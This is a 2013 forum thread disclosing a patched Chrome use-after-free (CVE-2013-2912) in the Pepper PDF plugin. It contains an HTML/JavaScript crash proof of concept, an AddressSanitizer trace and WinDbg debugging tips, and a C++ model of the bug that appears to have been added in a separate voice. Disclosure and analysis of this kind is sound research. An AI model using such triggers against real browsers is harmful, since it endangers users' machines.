
Chrome 29.0.1547.57 NotifyInstanceWasDeleted Use After Free PoC



41.w4r10r
10-17-2013, 08:25 PM
Hi,

This is a PoC affecting Chrome 29.0.1547.57, Beta and Canary, which got patched in the last Chrome update.
reference : http://googlechromereleases.blogspot.in/2013/10/stable-channel-update.html
CVE-2013-2912

The use-after-free vulnerability was in ppapi::proxy::PluginResource::NotifyInstanceWasDeleted and triggers with the ready state event and the DOMContentLoaded event; this issue also happens because a ready state event can be fired when loaders are canceled within the DOMContentLoaded event.



<html>
<body>
  <!-- Pepper PDF plugin instance; the referenced file does not need to exist -->
  <object id="pdf-viewer" src="filenotnecessary.pdf" type="application/pdf"></object>
  <script>
    var i = 0;
    var pdf;

    // First readystatechange: grab the plugin element.
    // Second readystatechange (fired while the DOMContentLoaded handler below
    // cancels the plugin's loaders): re-append the element. Moving it tears
    // down the old plugin instance (see the removeChild/destroy frames in the
    // stack trace), which frees the instance's resources.
    document.addEventListener('readystatechange', function () {
      if (i == 1) {
        document.body.appendChild(pdf);
      } else {
        pdf = document.getElementById("pdf-viewer");
      }
      i++;
    });

    // DOMContentLoaded: reloading the plugin cancels its loaders, which in turn
    // fires the second readystatechange handled above.
    window.addEventListener('DOMContentLoaded', function () {
      pdf.reload();
    });
  </script>
</body>
</html>

41.w4r10r
10-17-2013, 08:29 PM
Detailed Stack Trace:



heap-use-after-free on address 0x61300002ddc8 at pc 0x7f763f509092 bp 0x7fff190c5360 sp 0x7fff190c5358
READ of size 8 at 0x61300002ddc8 thread T0 (chrome)
#0 0x7f763f509091 in std::_Rb_tree<int, std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> >, std::_Select1st<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > >, std::less<int>, std::allocator<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > > >::_M_begin() /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/stl_tree.h:493
#1 0x7f763f52f32e in std::_Rb_tree<int, std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> >, std::_Select1st<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > >, std::less<int>, std::allocator<std::pair<int const, scoped_refptr<ppapi::proxy::PluginResourceCallbackBase> > > >::clear() /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../../include/c++/4.6/bits/stl_tree.h:809
#2 0x7f763d879420 in ppapi::ResourceTracker::DidDeleteInstance(int) out/Release/../../ppapi/shared_impl/resource_tracker.cc:160
#3 0x7f763e84e9c3 in content::HostGlobals::InstanceDeleted(int) out/Release/../../content/renderer/pepper/host_globals.cc:257
#4 0x7f763e5cc562 in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:563
#5 0x7f763e5cc17d in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:524
#6 0x7f763e8b36a7 in scoped_refptr<content::PepperPluginInstanceImpl>::operator=(content::PepperPluginInstanceImpl*) out/Release/../../base/memory/ref_counted.h:267
#7 0x7f763e8b3887 in content::PepperWebPluginImpl::destroy() out/Release/../../content/renderer/pepper/pepper_webplugin_impl.cc:126
#8 0x7f763fbfa03e in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:648
#9 0x7f763fbf9edd in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:642
#10 0x7f764236e0e3 in WTF::HashTable<WTF::RefPtr<WebCore::Widget>, WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*> >, WTF::PtrHash<WTF::RefPtr<WebCore::Widget> >, WTF::KeyValuePairHashTraits<WTF::HashTraits<WTF::RefPtr<WebCore::Widget> >, WTF::HashTraits<WebCore::FrameView*> >, WTF::HashTraits<WTF::RefPtr<WebCore::Widget> > >::deallocateTable(WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>*, int) out/Release/../../third_party/WebKit/Source/wtf/HashTable.h:876
#11 0x7f7642367499 in WebCore::WidgetHierarchyUpdatesSuspensionScope::moveWidgets() out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.cpp:69
#12 0x7f76416b7da9 in ~WidgetHierarchyUpdatesSuspensionScope out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.h:40
#13 0x7f76416b2c2d in WebCore::ContainerNode::removeChild(WebCore::Node*, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:498
#14 0x7f76416b14a0 in WebCore::collectChildrenAndRemoveFromOldParent(WebCore::Node*, WTF::Vector<WTF::RefPtr<WebCore::Node>, 11ul>&, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:70
#15 0x7f76416b1139 in WebCore::ContainerNode::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:609
#16 0x7f7641798fda in WebCore::Node::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/Node.cpp:543
#17 0x7f7641e419c8 in WebCore::V8Node::appendChildMethodCustom(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/../../third_party/WebKit/Source/bindings/v8/custom/V8NodeCustom.cpp:120
#18 0x7f7641d1773c in WebCore::NodeV8Internal::appendChildMethodCallbackForMainWorld(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/V8Node.cpp:703
#19 0x7f763ebe2b77 in v8::internal::FunctionCallbackArguments::Call(v8::Handle<v8::Value> (*)(v8::Arguments const&)) out/Release/../../v8/src/arguments.cc:103
#20 0x7f763ec07425 in v8::internal::MaybeObject* v8::internal::HandleApiCallHelper<false>(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1272
#21 0x7f763ebfaf84 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1288
#22 0x1a7a88f072ad in
0x61300002ddc8 is located 72 bytes inside of 384-byte region [0x61300002dd80,0x61300002df00)
freed by thread T0 (chrome) here:
#0 0x7f763b0e9e95 in operator delete _asan_rtl_
#1 0x7f763d876f9a in ppapi::Resource::NotifyInstanceWasDeleted() out/Release/../../ppapi/shared_impl/resource.cc:70
#2 0x7f763f52e36d in ppapi::proxy::PluginResource::NotifyInstanceWasDeleted() out/Release/../../ppapi/proxy/plugin_resource.cc:62
#3 0x7f763d879420 in ppapi::ResourceTracker::DidDeleteInstance(int) out/Release/../../ppapi/shared_impl/resource_tracker.cc:160
#4 0x7f763e84e9c3 in content::HostGlobals::InstanceDeleted(int) out/Release/../../content/renderer/pepper/host_globals.cc:257
#5 0x7f763e5cc562 in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:563
#6 0x7f763e5cc17d in ~PepperPluginInstanceImpl out/Release/../../content/renderer/pepper/pepper_plugin_instance_impl.cc:524
#7 0x7f763e8b36a7 in scoped_refptr<content::PepperPluginInstanceImpl>::operator=(content::PepperPluginInstanceImpl*) out/Release/../../base/memory/ref_counted.h:267
#8 0x7f763e8b3887 in content::PepperWebPluginImpl::destroy() out/Release/../../content/renderer/pepper/pepper_webplugin_impl.cc:126
#9 0x7f763fbfa03e in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:648
#10 0x7f763fbf9edd in ~WebPluginContainerImpl out/Release/../../third_party/WebKit/Source/web/WebPluginContainerImpl.cpp:642
#11 0x7f764236e0e3 in WTF::HashTable<WTF::RefPtr<WebCore::Widget>, WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>, WTF::KeyValuePairKeyExtractor<WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*> >, WTF::PtrHash<WTF::RefPtr<WebCore::Widget> >, WTF::KeyValuePairHashTraits<WTF::HashTraits<WTF::RefPtr<WebCore::Widget> >, WTF::HashTraits<WebCore::FrameView*> >, WTF::HashTraits<WTF::RefPtr<WebCore::Widget> > >::deallocateTable(WTF::KeyValuePair<WTF::RefPtr<WebCore::Widget>, WebCore::FrameView*>*, int) out/Release/../../third_party/WebKit/Source/wtf/HashTable.h:876
#12 0x7f7642367499 in WebCore::WidgetHierarchyUpdatesSuspensionScope::moveWidgets() out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.cpp:69
#13 0x7f76416b7da9 in ~WidgetHierarchyUpdatesSuspensionScope out/Release/../../third_party/WebKit/Source/core/rendering/RenderWidget.h:40
#14 0x7f76416b2c2d in WebCore::ContainerNode::removeChild(WebCore::Node*, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:498
#15 0x7f76416b14a0 in WebCore::collectChildrenAndRemoveFromOldParent(WebCore::Node*, WTF::Vector<WTF::RefPtr<WebCore::Node>, 11ul>&, WebCore::ExceptionState&) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:70
#16 0x7f76416b1139 in WebCore::ContainerNode::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/ContainerNode.cpp:609
#17 0x7f7641798fda in WebCore::Node::appendChild(WTF::PassRefPtr<WebCore::Node>, WebCore::ExceptionState&, WebCore::AttachBehavior) out/Release/../../third_party/WebKit/Source/core/dom/Node.cpp:543
#18 0x7f7641e419c8 in WebCore::V8Node::appendChildMethodCustom(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/../../third_party/WebKit/Source/bindings/v8/custom/V8NodeCustom.cpp:120
#19 0x7f7641d1773c in WebCore::NodeV8Internal::appendChildMethodCallbackForMainWorld(v8::FunctionCallbackInfo<v8::Value> const&) out/Release/gen/blink/bindings/V8Node.cpp:703
#20 0x7f763ebe2b77 in v8::internal::FunctionCallbackArguments::Call(v8::Handle<v8::Value> (*)(v8::Arguments const&)) out/Release/../../v8/src/arguments.cc:103
#21 0x7f763ec07425 in v8::internal::MaybeObject* v8::internal::HandleApiCallHelper<false>(v8::internal::(anonymous namespace)::BuiltinArguments<(v8::internal::BuiltinExtraArguments)1>, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1272
#22 0x7f763ebfaf84 in v8::internal::Builtin_HandleApiCall(int, v8::internal::Object**, v8::internal::Isolate*) out/Release/../../v8/src/builtins.cc:1288
#23 0x1a7a88f072ad in
#24 0x1a7a88f63a2e in
#25 0x1a7a88f108b3 in
#26 0x1a7a88f2acfd in
#27 0x1a7a88f17e16 in
#28 0x7f763ec77dd2 in v8::internal::Invoke(bool, v8::internal::Handle<v8::internal::JSFunction>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*, bool*) out/Release/../../v8/src/execution.cc:119
#29 0x7f763ebb9e78 in v8::Function::Call(v8::Handle<v8::Object>, int, v8::Handle<v8::Value>*) out/Release/../../v8/src/api.cc:4387
previously allocated by thread T0 (chrome) here:


Keep hunting for bugs :D
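
A simplified model of the pattern the ASan trace above shows (the object is freed inside Resource::NotifyInstanceWasDeleted, and PluginResource::NotifyInstanceWasDeleted then goes on to clear its callback map), written as an added example that is not Chromium code. The class and method names mirror the trace, but the ownership model, the g_live bookkeeping that stands in for ASan, and the keep-alive reference shown as the hardened variant are all our own assumptions, not the project's actual fix.

```cpp
#include <functional>
#include <map>
#include <memory>
#include <set>

// Constructed model: addresses of live resources, so the buggy variant can report
// "would have been a use-after-free" instead of actually touching freed memory.
static std::set<const void*> g_live;

class Resource : public std::enable_shared_from_this<Resource> {
 public:
  Resource() { g_live.insert(this); }
  virtual ~Resource() { g_live.erase(this); }
  std::shared_ptr<Resource>* tracker_slot = nullptr;  // tracker's strong ref to us
  // Base notification: the tracker drops its reference. If that was the last
  // one, *this is destroyed before this function returns to the caller.
  virtual bool NotifyInstanceWasDeleted() {
    if (tracker_slot) tracker_slot->reset();
    return true;
  }
};

class PluginResource : public Resource {
 public:
  std::map<int, std::function<void()>> callbacks;
  bool keep_alive;  // true selects the hardened variant
  explicit PluginResource(bool hardened) : keep_alive(hardened) {}
  // Returns false when the member access after the base call would have been a
  // use-after-free (the buggy ordering); true when the object was kept alive.
  bool NotifyInstanceWasDeleted() override {
    std::shared_ptr<Resource> protect;
    if (keep_alive) protect = shared_from_this();  // hold *this across the base call
    Resource::NotifyInstanceWasDeleted();           // may release the last reference
    if (!g_live.count(this)) return false;          // buggy variant: already freed
    callbacks.clear();                              // safe only while a ref is held
    return true;
  }
};

// Model of ResourceTracker::DidDeleteInstance(): the tracker holds the only
// strong reference and notifies the resource that its instance is gone.
bool DidDeleteInstance(bool hardened) {
  std::shared_ptr<Resource> slot = std::make_shared<PluginResource>(hardened);
  static_cast<PluginResource&>(*slot).callbacks[1] = [] {};
  slot->tracker_slot = &slot;
  return slot->NotifyInstanceWasDeleted();
}
```

In the hardened variant the local keep-alive reference delays destruction until NotifyInstanceWasDeleted returns, so the callback map is cleared on a live object; in both variants the object is gone once DidDeleteInstance returns.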

1qaz2wsx
12-19-2013, 02:01 PM
Hi~
I want to reproduce this bug. Can you tell me which debugger you use, and how to attach to Chrome?
I tried to attach to it using OllyDbg or WinDbg but it did not work.
Thanks

41.w4r10r
12-19-2013, 04:16 PM
I am using WinDbg for analyzing crashes. For Chrome or any other sandboxed process debugging, you need to tick a check box when you are executing the program under WinDbg.

e.g.: Start WinDbg -> press Ctrl+E -> select the program you want to debug (c:\program files\google\chrome\application\chrome.exe) -> click on "debug child process also" (bottom of the box) -> click Open

The above process will start Chrome under WinDbg. Now load your PoC into Chrome and you can see the crash under the debugger; now you can start analyzing it ;)

1qaz2wsx
12-25-2013, 12:22 PM
Happy Christmas! :)
Thanks for your reply~ but I have another question.
I use XP SP3 + Chrome + WinDbg and I get the crash at: chrome_1c30000!RelaunchChromeBrowserWithNewCommandLineIfNeeded+0x94e13e:
035395c9 807f1500 cmp byte ptr [edi+15h],0 ds:0023:fa60061b=??
I want to know how you identify the thread that has the flaw?
Please give me some advice.